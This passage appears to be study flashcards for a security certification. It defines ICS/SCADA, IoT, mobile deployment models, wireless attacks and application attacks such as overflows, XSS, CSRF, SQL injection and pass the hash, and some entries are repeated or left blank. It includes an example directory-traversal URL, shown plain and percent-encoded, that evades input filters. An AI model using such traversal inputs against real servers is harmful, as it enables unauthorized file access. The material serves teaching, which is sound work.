supervisory control and data acquisition (SCADA) system takes the place of a control server in large-scale, multiple-site ICSs. SCADA typically run as software on ordinary computers, gathering data from and managing plant devices and equipment with embedded PLCs, referred to as field devices. SCADA typically use WAN communications, such as cellular or satellite, to link the SCADA server to field devices.

Term

 Internet of Things (IoT) 
Devices that can report state and configuration data and be remotely managed over IP networks.

 

Definition
The term Internet of Things (IoT) is used to describe a global network of appliances and personal devices that have been equipped with sensors, software, and network connectivity.
Term

building automation system (BAS) 
Components and protocols that facilitate the centralized configuration and monitoring of mechanical and electrical systems within offices and data centers.

 

Definition
Term

 smart meter
A utility meter that can submit readings to the supplier without user intervention.

 

Definition

smart meter provides continually updating reports of electricity, gas, or water usage to the supplier, reducing the need for manual inspections. Most meters use cellular data for communication back to the supplier, and an IoT protocol, such as ZigBee, for integration with smart appliances.  

 

Term

Any device that performs more than one function, but typically print devices that can also scan and fax. 

 

Definition
 Unless they have been securely deleted, images and documents are frequently recoverable from all of these machines. Some of the more feature-rich, networked printers and MFPs can also be used as a pivot point to attack the rest of the network. These machines also have their own firmware that must be kept patched and updated.
Term

CAN bus
A serial network designed to allow communications between embedded programmable logic controllers.

 

Definition
The CAN bus operates in a somewhat similar manner to shared Ethernet and was designed with just as little security. ECUs transmit messages as broadcast so they are received by all other ECUs on the same bus. There is no concept of source addressing or message authentication. An attacker able to attach a malicious device to the OBD-II port is able to perform DoS attacks against the CAN bus, threatening the safety of the vehicle. There are also remote means of accessing the CAN bus, such as via the cellular features of the automobile's navigation and entertainment system (wired.com/2015/07/hackers-remotely-kill-jeep-highway). Some vehicles also implement on-board Wi-Fi, further broadening the attack surface.
Term
deployment model
Methods of provisioning mobile devices to users, such as BYOD and CYOD.
Definition
A mobile device deployment model describes the way employees are provided with mobile devices and applications.
Term
Bring your own device (BYOD)
Security framework and tools to facilitate use of personally-owned devices to access corporate networks and data.
Definition

the mobile device is owned by the employee. The mobile will have to meet whatever profile is required by the company (in terms of OS version and functionality) and the employee will have to agree on the installation of corporate apps and to some level of oversight and auditing. This model is usually the most popular with employees but poses the most difficulties for security and network managers.

Term

Corporate owned, business only (COBO)
Enterprise mobile device provisioning model where the device is the property of the organization and personal use is prohibited.

 

Definition
the device is the property of the company and may only be used for company business.
Term

Corporate owned, personally-enabled (COPE)
Enterprise mobile device provisioning model where the device remains the property of the organization, but certain personal use, such as private email, social networking, and web browsing, is permitted.

 

Definition
the device is chosen and supplied by the company and remains its property. The employee may use it to access personal email and social media accounts and for personal web browsing (subject to whatever acceptable use policies are in force).
Term

Choose your own device (CYOD)
Enterprise mobile device provisioning model where employees are offered a selection of corporate devices for work and, optionally, private use.

 

Definition
much the same as COPE but the employee is given a choice of device from a list.
Term
Virtual desktop infrastructure (VDI)
Definition

Virtualization can provide an additional deployment model. Virtual desktop infrastructure (VDI) means provisioning an OS desktop to interchangeable hardware. The hardware only has to be capable of running a VDI client viewer, or have browser support for a clientless HTML5 solution. The instance is provided "as new" for each session and can be accessed remotely. The same technology can be accessed via a mobile device such as a smartphone or tablet. This removes some of the security concerns about BYOD as the corporate apps and data are segmented from the other apps on the device. 

Term
Enterprise mobility management (EMM)
Definition
 is a class of management software designed to apply security policies to the use of mobile devices and apps in the enterprise. The challenge of identifying and managing attached devices is often referred to as visibility. EMM software can be used to manage enterprise-owned devices as well as BYOD. 
Term

Mobile device management (MDM)
The process and supporting technologies for tracking, controlling, and securing the organization's mobile infrastructure.

 

Definition

§  sets device policies for authentication, feature use (camera and microphone), and connectivity. MDM can also allow device resets and remote wipes.

Term

Mobile application management (MAM)
Enterprise management function that enables control over apps and storage for mobile devices and other endpoints.

 

Definition
sets policies for apps that can process corporate data, and prevents data transfer to personal apps. This type of solution configures an enterprise-managed container or workspace.
Term

 unified endpoint management (UEM)

×
 

Enterprise software for controlling device settings, apps, and corporate data storage on all types of fixed, mobile, and IoT computing devices.

 
Enterprise software for controlling device settings, apps, and corporate data storage on all types of fixed, mobile, and IoT computing devices.

 

Definition
Term
SEAndroid
Since version 4.3, Android has been based on Security-Enhanced Linux. SEAndroid uses mandatory access control (MAC) policies to run apps in sandboxes. When the app is installed, access is granted (or not) to specific shared features, such as contact details, SMS texting, and email. 
Definition

Since version 4.3, Android has been based on Security-Enhanced Linux, enabling granular permissions for apps, container isolation, and storage segmentation.

 

Term

Screen Lock

Definition

The screen lock can also be configured with a lockout policy. This means that if an incorrect passcode is entered, the device locks for a set period. This could be configured to escalate (so the first incorrect attempt locks the device for 30 seconds while the third locks it for 10 minutes, for instance). This deters attempts to guess the passcode.

 

Term

context-aware authentication
An access control scheme that verifies an object's identity based on various environmental factors, like time, location, and behavior.

 

Definition

It is also important to consider newer authentication models, such as context-aware authentication. For example, smartphones now allow users to disable screen locks when the device detects that it is in a trusted location, such as the home. Conversely, an enterprise may seek more stringent access controls to prevent misuse of a device. For example, even if the device has been unlocked, accessing a corporate workspace might require the user to authenticate again. It might also check whether the network connection can be trusted (that it is not an open Wi-Fi hotspot, for instance).

Term

remote wipe 

Software that allows deletion of data and settings on a mobile device to be initiated from a remote server.

 

Definition

remote wipe or kill switch means that if the handset is stolen it can be set to the factory defaults or cleared of any personal data (sanitization). Some utilities may also be able to wipe any plug-in memory cards too. The remote wipe could be triggered by several incorrect passcode attempts or by enterprise management software. Other features include backing up data from the phone to a server first and displaying a "Lost/stolen phone—return to XX" message on the handset.

In theory, a thief can prevent a remote wipe by ensuring the phone cannot connect to the network, then hacking the phone and disabling the security.

 

Term
Global Positioning System (GPS)—
Definition

§  a means of determining the device's latitude and longitude based on information received from satellites via a GPS sensor.

Means of determining a receiver's position on the Earth based on information received from GPS satellites. The receiver must have line-of-sight to the GPS satellites.

global positioning system (GPS) sensor triangulates the device position using signals from orbital GPS satellites. As this triangulation process can be slow, most smartphones use Assisted GPS (A-GPS) to obtain coordinates from the nearest cell tower and adjust for the device's position relative to the tower.

 

 

Term
Indoor Positioning System (IPS)
Definition

A means of deriving a device's location when indoors, by triangulating its proximity to radio sources such as Bluetooth beacons or WAPs.

 

works out a device's location by triangulating its proximity to other radio sources, such as cell towers, Wi-Fi access points, and Bluetooth/RFID beacons.

Term
Geofencing 
Definition

The practice of creating a virtual boundary based on real-world geography.

 

Geofencing is the practice of creating a virtual boundary based on real-world geography. Geofencing can be a useful tool with respect to controlling the use of camera or video functions or applying context-aware authentication. An organization may use geofencing to create a perimeter around its office property, and subsequently, limit the functionality of any devices that exceed this boundary. An unlocked smartphone could be locked and forced to reauthenticate when entering the premises, and the camera and microphone could be disabled. The device's position is obtained from location services.

Term

GPS Tagging

Definition
GPS tagging is the process of adding geographical identification metadata, such as the latitude and longitude where the device was located at the time, to media such as photographs, SMS messages, video, and so on. It allows the app to place the media at specific latitude and longitude coordinates. GPS tagging is highly sensitive personal information and potentially confidential organizational data also. GPS tagged pictures uploaded to social media could be used to track a person's movements and location. 
Term
 sideloading
Definition

Installing an app to a mobile device without using an app store.

Unlike iOS, Android allows for selection of different stores and installation of untrusted apps from any third party, if this option is enabled by the user. With unknown sources enabled, untrusted apps can be downloaded from a website and installed using the .apk file format. This is referred to as sideloading

 

 

Term
Containerization
Definition

A type of virtualization applied by a host operating system to provision an isolated execution environment for an application.

 

Containerization allows the employer to manage and maintain the portion of the device that interfaces with the corporate network. An enterprise workspace with a defined selection of apps and a separate container is created. This container isolates corporate apps from the rest of the device. There may be a requirement for additional authentication to access the workspace.

Term
Rooting
Definition

§  this term is associated with Android devices. Some vendors provide authorized mechanisms for users to access the root account on their device. For some devices it is necessary to exploit a vulnerability or use custom firmware. Custom firmware is essentially a new Android OS image applied to the device. This can also be referred to as a custom ROM, after the term for the read only memory chips that used to hold firmware.

Term
Jailbreaking
Definition

iOS is more restrictive than Android so the term "jailbreaking" became popular for exploits that enabled the user to obtain root privileges, sideload apps, change or add carriers, and customize the interface. iOS jailbreaking is accomplished by booting the device with a patched kernel. For most exploits, this can only be done when the device is attached to a computer when it boots (tethered jailbreak).

Term
Carrier unlocking
Definition

Removing restrictions placed on a handset that was sold by a telecoms provider.

for either iOS or Android, this means removing the restrictions that lock a device to a single carrier

 

Term
Personal area networks (PANs) 
Definition

Close-range networking (usually based on Bluetooth or NFC) allowing communications between personal devices, such as smartphones, laptops, and printers/peripheral devices.

Personal area networks (PANs) enable connectivity between a mobile device and peripherals. Ad hoc (or peer-to-peer) networks between mobile devices or between mobile devices and other computing devices can also be established. In terms of corporate security, these peer-to-peer functions should generally be disabled. It might be possible for an attacker to exploit a misconfigured device and obtain a bridged connection to the corporate network.

 

Term

 ad hoc network

×
 

A type of wireless network where connected devices communicate directly with each other instead of over an established medium.

A type of wireless network where connected devices communicate directly with each other instead of over an established medium.

 

Definition
Wireless stations can establish peer-to-peer connections with one another, rather than using an access point. This can also be called an ad hoc network, meaning that the network is not made permanently available.
Term
Wi-Fi Direct 
Definition

Wi-Fi Direct enables Wi-Fi devices to connect directly to each other, making it simple and convenient to print, share, sync, play games, and display content to another device. Wi-Fi Direct devices connect to one another without joining a traditional home, office, or public network.

 

Term

tethering.
Using the cellular data plan of a mobile device to provide Internet access to a laptop or PC. The PC can be tethered to the mobile by USB, Bluetooth, or Wi-Fi (a mobile hotspot).

 

Definition
Term

tethering
Using the cellular data plan of a mobile device to provide Internet access to a laptop or PC. The PC can be tethered to the mobile by USB, Bluetooth, or Wi-Fi (a mobile hotspot).

 

Definition
Term
 bluejacking
Definition

Sending an unsolicited message or picture message using a Bluetooth connection.


Unless some sort of authentication is configured, a discoverable device is vulnerable to bluejacking, a sort of spam where someone sends you an unsolicited text (or picture/video) message or vCard (contact details). 

Term

Bluesnarfing 

A wireless attack where an attacker gains access to unauthorized information on a device using a Bluetooth connection.

 

Definition
Bluesnarfing refers to using an exploit in Bluetooth to steal information from someone else's phone. The exploit (now patched) allows attackers to circumvent the authentication mechanism. Even without an exploit, a short (4 digit) PIN code is vulnerable to brute force password guessing.
Term
 wearable technology
Definition

Computing devices integrated into wearable items, such as bands, watches, and glasses. Most are focused on providing information and contact management via the Internet and many incorporate health and fitness monitoring.

 

Term
use of infrared in modern smartphones and wearable technology focuses on two other uses:
Definition

 

  • IR blaster—this allows the device to interact with an IR receiver and operate a device such as a TV or HVAC monitor as though it were the remote control handset.
  • IR sensor—these are used as proximity sensors (to detect when a smartphone is being held to the ear, for instance) and to measure health information (such as heart rate and blood oxygen levels). 
Term
Radio Frequency ID (RFID) 
Definition

A means of encoding information into passive tags, which can be easily attached to devices, structures, clothing, or almost anything else.

 

is a means of encoding information into passive tags, which can be easily attached to devices, structures, clothing, or almost anything else. A passive tag can have a range from a few centimeters to a few meters. When a reader is within range of the tag, it produces an electromagnetic wave that powers up the tag and allows the reader to collect information from it or to change the values encoded in the tag. There are also battery-powered active tags that can be read at much greater distances (hundreds of meters).

Term

NEAR FIELD COMMUNICATIONS 
A standard for peer-to-peer (2-way) radio communications over very short (around 4 cm) distances, facilitating contactless payment and similar technologies. NFC is based on RFID.

 

Definition

NFC does not provide encryption, so eavesdropping and man-in-the-middle attacks are possible if the attacker can find some way of intercepting the communication and the software services are not encrypting the data.

The widest application of NFC is to make payments via contactless point-of-sale (PoS) machines. 

Despite having a close physical proximity requirement, NFC is vulnerable to several types of attacks. Certain antenna configurations may be able to pick up the RF signals emitted by NFC from several feet away, giving an attacker the ability to eavesdrop from a more comfortable distance. An attacker with a reader may also be able to skim information from an NFC device in a crowded area, such as a busy train station. An attacker may also be able to corrupt data as it is being transferred through a method similar to a DoS attack—by flooding the area with an excess of RF signals to interrupt the transfer. 

 

Term
USB On The Go (OTG)
Definition

USB specification allowing a mobile device to act as a host when a device such as an external drive or keyboard is attached.

Some Android USB ports support USB On The Go (OTG) and there are adapters for iOS devices. USB OTG allows a port to function either as a host or as a device. This function is determined by the state of a 5th pin in the connector. For example, a port on a smartphone might operate as a device when connected to a PC, but as a host when connected to a keyboard or external hard drive. The 5th pin communicates which mode the port is in.

 

Term
Short Message Service (SMS)

Multimedia Message Service (MMS) 
Definition

1)A system for sending text messages between cell phones. 

 

2)Extension to SMS allowing digital data (picture, video, or audio) to be sent over a cellular data connection.



Vulnerabilities in SMS and the SS7 signaling protocol that underpins it have cast doubt on the security of 2-step verification mechanisms

 

Term

Rich Communication Services (RCS)

Platform-independent advanced messaging functionality designed to replace SMS and MMS.

 

Definition
 is designed as a platform-independent advanced messaging app, with a similar feature set to proprietary apps like WhatsApp and iMessage. These features include support for video calling, larger binary attachments, group messaging/calling, and read receipts. RCS is supported by carriers via Universal Profile for Advanced MessagingThe main drawbacks of RCS are that carrier support is patchy (messages fallback to SMS if RCS is not supported) and there is no end-to-end encryption, at the time of writing
Term

Push notifications
Mechanism to send text messages to a browser or mobile device.

 

Definition

Push notifications are store services (such as Apple Push Notification Service and Google Cloud to Device Messaging) that an app or website can use to display an alert on a mobile device. Users can choose to disable notifications for an app, but otherwise the app developer can target notifications to some or all users with that app installed. Developers need to take care to properly secure the account and services used to send push notifications. There have been examples in the past of these accounts being hacked and used to send fake communications.

Term

 over-the-air (OTA)
A firmware update delivered on a cellular data connection.

 

Definition
These updates are usually pushed to the handset by the device vendor, often as part of OS upgrades. The updates can be delivered wirelessly, either through a Wi-Fi network or the data connection, referred to as over-the-air (OTA)
Term

MICROWAVE RADIO CONNECTION METHODS

Point-to-point (P2P)
A point-to-point topology is one where two nodes have a dedicated connection to one another.

 

Definition
microwave uses high-gain antennas to link two sites. "High-gain" means that the antenna is highly directional. Each antenna is pointed directly at the other. In terms of security, this makes it difficult to eavesdrop on the signal, as an intercepting antenna would have to be positioned within the direct path. The satellite modems or routers are also normally paired to one another and can use over-the-air encryption to further mitigate against snooping attacks.
Term
Point-to-multipoint (P2M) 
Definition

In a point-to-multipoint topology, a central node mediates links between remote nodes.

microwave uses smaller sectoral antennas, each covering a separate quadrant. Where P2P is between two sites, P2M links multiple sites or subscriber nodes to a single hub. This can be more cost-efficient in high density urban areas and requires less radio spectrum. Each subscriber node is distinguished by multiplexing. Because of the higher risk of signal interception compared to P2P, it is crucial that links be protected by over-the-air encryption.

 

Term
arbitrary code execution
Definition

A vulnerability that allows an attacker to run their own code or a module that exploits such a vulnerability.

The purpose of most application attacks is to allow the threat actor to run his or her own code on the system. This is referred to as arbitrary code execution.

 

Term
remote code execution.
Definition

A vulnerability that allows an attacker to transmit code from a remote host for execution on a target host or a module that exploits such a vulnerability.


Where the code is transmitted from one machine to another, it can be referred to as remote code execution. The code would typically be designed to install some sort of backdoor or to disable the system in some way (denial of service).

Term
There are two main types of privilege escalation:

Vertical privilege escalation 
Definition

When an attacker can perform functions that are normally assigned to users in higher roles, and often explicitly denied to the attacker.


-(or elevation) is where a user or application can access functionality or data that should not be available to them. For instance, a process might run with local administrator privileges, but a vulnerability allows the arbitrary code to run with higher system privileges.

Term

There are two main types of privilege escalation:

Horizontal privilege escalation

Definition

When a user accesses or modifies specific resources that they are not entitled to.

-  is where a user accesses functionality or data that is intended for another user. For instance, via a process running with local administrator privileges on a client workstation, the arbitrary code is able to execute as a domain account on an application server.

Term
Error Handling
Definition

An application attack may cause an error message. In Windows, this may be of the following types: "Instruction could not be read or written," "Undefined exception," or "Process has encountered a problem." One issue for error handling is that the application should not reveal configuration or platform details that could help an attacker. For example, an unhandled exception on a web application might show an error page that reveals the type and configuration of a database server.

Term
Improper Input Handling  
Definition

Most software accepts user input of some kind, whether the input is typed manually or passed to the program by another program, such as a browser passing a URL to a web server or a Windows process using another process via its application programming interface. Good programming practice dictates that input should be tested to ensure that it is valid; that is, the sort of data expected by the receiving process. Most application attacks work by passing invalid or maliciously constructed data to the vulnerable process. There are many ways of exploiting improper input handling, but many attacks can be described as either overflow-type attacks or injection-type attacks.

Term
buffer overflow
 [image]
Definition

An attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory. This can allow the attacker to crash the system or execute arbitrary code.

 

A buffer is an area of memory that the application reserves to store expected data. To exploit a buffer overflow vulnerability, the attacker passes data that deliberately overfills the buffer. One of the most common vulnerabilities is a stack overflow. The stack is an area of memory used by a program subroutine. It includes a return address, which is the location of the program that has called the subroutine. An attacker could use a buffer overflow to change the return address, allowing the attacker to run arbitrary code on the system. 

 

Term

Integer Overflow

Definition

An attack in which a computed result is too large to fit in its assigned storage space, which may lead to crashing or data corruption, and may trigger a buffer overflow.

 


Integers (whole numbers) are widely used as a data type, where they are commonly defined with fixed lower and upper bounds. An 
integer overflow attack causes the target software to calculate a value that exceeds these bounds. This may cause a positive number to become negative (changing a bank debit to a credit, for instance). It could also be used where the software is calculating a buffer size.

Term
pointer dereference 
Definition

A software vulnerability that can occur when code attempts to read a memory location specified by a pointer, but the memory location is null.


In C/C++ programming, a pointer is a variable that stores a memory location, rather than a value. Attempting to read or write that memory address via the pointer is called dereferencing. If the memory location is invalid or null (perhaps by some malicious process altering the execution environment), this creates a null pointer dereference type of exception, and the process will crash, probably. 

Term
Race conditions
Definition

A software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer.

 

Term
time of check to time of use (TOCTTOU)
Definition

The potential vulnerability that occurs when there is a change between when an app checked a resource and when the app used the resource.

Race condition attacks can also be directed at databases and file systems. A time of check to time of use (TOCTTOU) race condition occurs when there is a change between when an app checked a resource and when the app used the resource. This change invalidates the check. An attacker that can identify a TOCTTOU vulnerability will attempt to manipulate data after it has been checked but before the application can use this data to perform some operation. For example, if an application creates a temporary file to store a value for later use, and an attacker can replace or delete this file between the time it is created and the time it is used, then the attacker is exploiting a TOCTTOU vulnerability.

 

 

Term
Memory leaks 
Definition

A software vulnerability that can occur when software does not release allocated memory when it is done using it, potentially leading to system instability.

Memory leaks are particularly serious in service/background applications, as they will continue to consume memory over an extended period. Memory leaks in the OS kernel are also extremely serious. A memory leak may itself be a sign of a malicious or corrupted process.

 

Term
DLL injection
Definition

A software vulnerability that can occur when a Windows-based application attempts to force another running application to load a Dynamic Link Library (DLL) in memory that could cause the victim application to experience instability or leak sensitive information.

DLL injection is a vulnerability in the way the operating system allows one process to attach to another. This functionality can be abused by malware to force a legitimate process to load a malicious link library. The link library will contain whatever functions the malware author wants to be able to run. Malware uses this technique to move from one host process to another to avoid detection. A process that has been compromised by DLL injection might open unexpected network connections, or interact with files and the registry suspiciously.

 

Term
 Refactoring
Definition

The process of restructuring application code in such a way that the same functionality is provided by different programming methods. Refactoring is often used to improve an application's design without affecting the external behavior of the application, or to enable it to handle particular situations.


 Refactoring means that the code performs the same function by using different methods (control blocks, variable types, and so on). Refactoring means that the A-V software may no longer identify the malware by its signature.

Term
shim
Definition

The process of developing and implementing additional code between an application and the operating system to enable functionality that would otherwise be unavailable.



. The code library that intercepts and redirects calls to enable legacy mode functionality is called a shim. The shim must be added to the registry and its files (packed in a shim database/.SDB file) added to the system folder. The shim database represents a way that malware with local administrator privileges can run on reboot (persistence).

Term

pass the hash (PtH)[image]
The pass the hash process. The Security Accounts Manager (SAM) is a Windows registry database that stores local account credentials. 

×

 

Definition

One common credential exploit technique for lateral movement is called pass the hash (PtH). This is the process of harvesting an account's cached credentials when the user is logged into a single sign-on (SSO) system so the attacker can use the credentials on other systems

A network-based attack where the attacker steals hashed user credentials and uses them as-is to try to authenticate to the same network the hashed credentials originated on.

If the threat actor can obtain the hash of a user password, it is possible to present the hash (without cracking it) to authenticate to network protocols such as the Windows File Sharing protocol Server Message Block (SMB), and other protocols that accept Windows NT LAN Manager (NTLM) hashes as authentication credentials. For example, most Windows domain networks are configured to allow NTLM as a legacy authentication method for services. The attacker's access isn't just limited to a single host, as they can pass the hash onto any computer in the network that is tied to the domain. This drastically cuts down on the effort the threat actor must spend in moving from host to host.

 

Term
 uniform resource locator (URL) 
Definition

Application-level addressing scheme for TCP/IP, allowing for human-readable resource addressing. For example: protocol://server/file, where "protocol" is the type of resource (HTTP, FTP), "server" is the name of the computer (www.microsoft.com), and "file" is the name of the resource you wish to access.

 

Term

Percent encoding

 

Definition

Mechanism for encoding characters as hexadecimal values delimited by the percent sign.

Term
APPLICATION PROGRAMMING INTERFACE ATTACKS
Definition

Some other common attacks against APIs target the following weaknesses and vulnerabilities:

§  Ineffective secrets management, allowing threat actors to discover an API key and perform any action authorized to that key.

§  Lack of input validation, allowing the threat actor to insert arbitrary parameters into API methods and queries. This is often referred to as allowing unsanitized input.

§  Error messages revealing clues to a potential adversary. For example, an authentication error should not reveal whether a valid username has been rejected because of an invalid password. The error should simply indicate an authentication failure.

 

§  Denial of service (DoS) by bombarding the API with spurious calls. Protection against this attack can be provided through throttling/rate-limiting mechanisms.

Term
replay attack
Definition

An attack where the attacker intercepts some authentication data and reuses it to try to re-establish a session.


To establish a session, the server normally gives the client some type of token. A replay attack works by sniffing or guessing the token value and then submitting it to re-establish the session illegitimately.

Term
 session hijacking 
Definition

A type of spoofing attack where the attacker disconnects a host then replaces it with his or her own machine, spoofing the original host's IP address.


In the context of a web application, session hijacking most often means replaying a cookie in some way. Attackers can sniff network traffic to obtain session cookies sent over an unsecured network, like a public Wi-Fi hotspot. To counter cookie hijacking, you can encrypt cookies during the transmission process, delete cookies from the client's browser cache when the client terminates the session, and design your web app to deliver a new cookie with each new session between the app and the client's browser.

Term
client-side or cross-site request forgery (CSRF or XSRF)

A client-side or cross-site request forgery (CSRF or XSRF) can exploit applications that use cookies to authenticate users and track sessions.
Definition

A malicious script hosted on the attacker's site that can exploit a session started on another site in the same browser.

 

client-side or cross-site request forgery (CSRF or XSRF) can exploit applications that use cookies to authenticate users and track sessions. To work, the attacker must convince the victim to start a session with the target site. The attacker must then pass an HTTP request to the victim's browser that spoofs an action on the target site, such as changing a password or an email address. This request could be disguised in a few ways and so could be accomplished without the victim necessarily having to click a link. If the target site assumes that the browser is authenticated because there is a valid session cookie and doesn't complete any additional authorization process on the attacker's input (or if the attacker is able to spoof the authorization), it will accept the input as genuine. This is also referred to as a confused deputy attack (the point being that the user and the user's browser are not necessarily the same thing).

Term

Clickjacking

Definition

A type of hijacking attack that forces a user to unintentionally click a link that is embedded in or hidden by other web page elements.

 

Clickjacking is an attack where what the user sees and trusts as a web application with some sort of login page or form contains a malicious layer or invisible iFrame (a web page embedded inside another web page) that allows an attacker to intercept or redirect user input. Clickjacking can be launched using any type of compromise that allows the adversary to run arbitrary code as a script. Clickjacking can be mitigated by using HTTP response headers that instruct the browser not to open frames from different origins (domains) and by ensuring that any buttons or input boxes on a page are positioned on the top-most layer.

 

Term

Clickjacking

Definition

A type of hijacking attack that forces a user to unintentionally click a link that is embedded in or hidden by other web page elements.

 

Clickjacking is an attack where what the user sees and trusts as a web application with some sort of login page or form contains a malicious layer or invisible iFrame (a web page embedded inside another web page) that allows an attacker to intercept or redirect user input. Clickjacking can be launched using any type of compromise that allows the adversary to run arbitrary code as a script. Clickjacking can be mitigated by using HTTP response headers that instruct the browser not to open frames from different origins (domains) and by ensuring that any buttons or input boxes on a page are positioned on the top-most layer.

 

Term
cross-site scripting (XSS)
XSS exploits a browser’s trust and can perform an XSRF attack.
Definition

A malicious script hosted on the attacker's site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser's security model of trusted zones.

A nonpersistent type of XSS attack would proceed as follows:

1.    The attacker identifies an input validation vulnerability in the trusted site.

2.    The attacker crafts a URL to perform a code injection against the trusted site. This could be coded in a link from the attacker's site to the trusted site or a link in an email message.

 

3.    When the user clicks the link, the trusted site returns a page containing the malicious code injected by the attacker. As the browser is likely to be configured to allow the site to run scripts, the malicious code will execute.

 

Term

Document Object Model (DOM) 

When attackers send malicious scripts to a web app's client-side implementation of JavaScript to execute their attack solely on the client.

 

Definition
Term
server-side attack causes the server to do some processing or run a script or query in a way that is not authorized by the application design. Most server-side attacks depend on some kind of injection attack. 
Definition
Term

 Structured Query Language (SQL)
A programming and query language common to many largescale database systems. SQL

 

Definition

A web application is likely to use Structured Query Language (SQL) to read and write information from a database. The main database operations are performed by SQL statements for selecting data (SELECT), inserting data (INSERT), deleting data (DELETE), and updating data (UPDATE). 

Term

 SQL injection attack
An attack that injects a database query into the input data directed at a server by accessing the client side of the application.

 

Definition
In a SQL injection attack, the threat actor modifies one or more of these four basic functions by adding code to some input accepted by the app, causing it to execute the attacker's own set of SQL queries or parameters. If successful, this could allow the attacker to extract or insert information into the database or execute arbitrary code on the remote system using the same privileges as the database application 
Term

Extensible Markup Language (XML) 

A system for structuring documents so that they are human- and machine-readable. Information within the document is placed within tags, which describe how information within the document is structured.

 

Definition

Extensible Markup Language (XML) is used by apps for authentication and authorizations, and for other types of data exchange and uploading. Data submitted via XML with no encryption or input validation is vulnerable to spoofing, request forgery, and injection of arbitrary data or code.

Term

Lightweight Directory Access Protocol (LDAP)  Injection

An application attack that targets webbased applications by fabricating LDAP statements that are typically created by user input.

 

 

Definition

The Lightweight Directory Access Protocol (LDAP) is another example of a query language. LDAP is specifically used to read and write network directory databases. A threat actor could exploit either unauthenticated access or a vulnerability in a client app to submit arbitrary LDAP queries. This could allow accounts to be created or deleted, or for the attacker to change authorizations and privileges 

Term

Directory traversal  is another type of injection attack performed against a web server.

Definition

An application attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory.


Directory traversal is another type of injection attack performed against a web server. The threat actor submits a request for a file outside the web server's root directory by submitting a path to navigate to the parent directory (../). This attack can succeed if the input is not filtered properly and access permissions on the file are the same as those on the web server directory.

Term
canonicalization attack 
Definition

Attack method where input characters are encoded in such a way as to evade vulnerable input validation measures.

The threat actor might use a canonicalization attack to disguise the nature of the malicious input. Canonicalization refers to the way the server converts between the different methods by which a resource (such as a file path or URL) may be represented and submitted to the simplest (or canonical) method used by the server to process the input. Examples of encoding schemes include HTML entities and character set percent encoding (ASCII and Unicode). An attacker might be able to exploit vulnerabilities in the canonicalization process to perform code injection or facilitate directory traversal. For example, to perform a directory traversal attack, the attacker might submit a URL such as:

http://victim.foo/?show=../../../../etc/config


A limited input validation routine would prevent the use of the string ../ and refuse the request. If the attacker submitted the URL using the encoded version of the characters, he or she might be able to circumvent the validation routine:

 

http://victim.foo/?show=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/config

 

Term

 command injection 
Where a threat actor is able to execute arbitrary shell commands on a host via a vulnerable web application.

 

Definition


command injection attack attempts to cause the server to run OS shell commands and return the output to the browser. As with directory traversal, the web server should normally be able to prevent commands from operating outside of the server's directory root and to prevent commands from running with any other privilege level than the web "guest" user (who is normally granted only very restricted privileges). A successful command injection attack would find some way of circumventing this security (or find a web server that is not properly configured). 

Term
server-side request forgery (SSRF
While with CSRF an exploit only has the privileges of the client, with SSRF the manipulated request is made with the server's privilege level.
Definition

A server-side request forgery (SSRF) causes the server application to process an arbitrary request that targets another service, either on the same host or a different one. SSRF exploits both the lack of authentication between the internal servers and services (implicit trust) and weak input validation, allowing the attacker to submit unsanitized requests or API parameters.

 

Term
input validation
Definition

Any technique used to ensure that the data entered into a field or variable in an application is handled appropriately by that application.

 

A primary vector for attacking applications is to exploit faulty input validation. Input could include user data entered into a form or URL passed by another application as a URL or HTTP header. Malicious input could be crafted to perform an overflow attack or some type of script or SQL injection attack. To mitigate this risk, all input methods should be documented with a view to reducing the potential attack surface exposed by the application. There must be routines to check user input, and anything that does not conform to what is required must be rejected.

 

Term

 Normalization 

A routine that applies a common consistent format to incoming data so that it can be processed safely. Normalization is referred to in the context of log collection and software coding.

 

Definition

Where an application accepts string input, the input should be subjected to normalization procedures before being accepted. Normalization means that a string is stripped of illegal characters or substrings and converted to the accepted character set. This ensures that the string is in a format that can be processed correctly by the input validation routines.

Term

 Output encoding 

Coding methods to sanitize output created from user input.

 

Definition
. Output encoding means that the string is re-encoded safely for the context in which it is being used.
Term

 

Secure Cookies

Definition

 Some of the key parameters for the SetCookie header are:

  • Avoid using persistent cookies for session authentication. Always use a new cookie when the user reauthenticates.
  • Set the Secure attribute to prevent a cookie being sent over unencrypted HTTP.
  • Set the HttpOnly attribute to make the cookie inaccessible to document object model/client-side scripting.
  • Use the SameSite attribute to control from where a cookie may be sent, mitigating request forgery attacks.
Term

Response Headers  

Definition

Some of the most important security-relevant header options are:

  • HTTP Strict Transport Security (HSTS)—forces browser to connect using HTTPS only, mitigating downgrade attacks, such as SSL stripping.
  • Content Security Policy (CSP)—mitigates clickjacking, script injection, and other client-side attacks. Note that X-Frame-Options and X-XSS-Protection provide mitigation for older browser versions, but are now deprecated in favor of CSP.
  • Cache-Control—sets whether the browser can cache responses. Preventing caching of data protects confidential and personal information where the client device might be shared by multiple users.
Term
Data exposure 
Definition

A software vulnerability where an attacker is able to circumvent access controls and retrieve confidential or sensitive data from the file system or database.

 

Term
structured exception handler (SEH)
Definition

A mechanism to account for unexpected error conditions that might arise during code execution. Effective error handling reduces the chances that a program could be exploited.

 

Term
exceptions
Definition

An application vulnerability defined by how an application responds to unexpected errors that can lead to holes in the security of an app.

 

Term

Memory Management

Definition

Many arbitrary code attacks depend on the target application having faulty memory management procedures. This allows the attacker to execute his or her own code in the space marked out by the target application. There are known unsecure practices for memory management that should be avoided and checks for processing untrusted input, such as strings, to ensure that it cannot overwrite areas of memory.

Term
Code reuse 
Definition

Potentially unsecure programming practice of using code originally written for a different context.


using a block of code from elsewhere in the same application or from another application to perform a different function (or perform the same function in a different context). The risk here is that the copy and paste approach causes the developer to overlook potential vulnerabilities (perhaps the function's input parameters are no longer validated in the new context).

Term
Software development kit (SDK)
Definition

Coding resources provided by a vendor to assist with development projects that use their platform or API.

using sample code or libraries of pre-built functions from the programming environment used to create the software or interact with a third party API. As with other third party libraries or code, it is imperative to monitor for vulnerabilities.

 

Term
Stored procedures 
Definition

One of a set of pre-compiled database statements that can be used to validate input to a database.

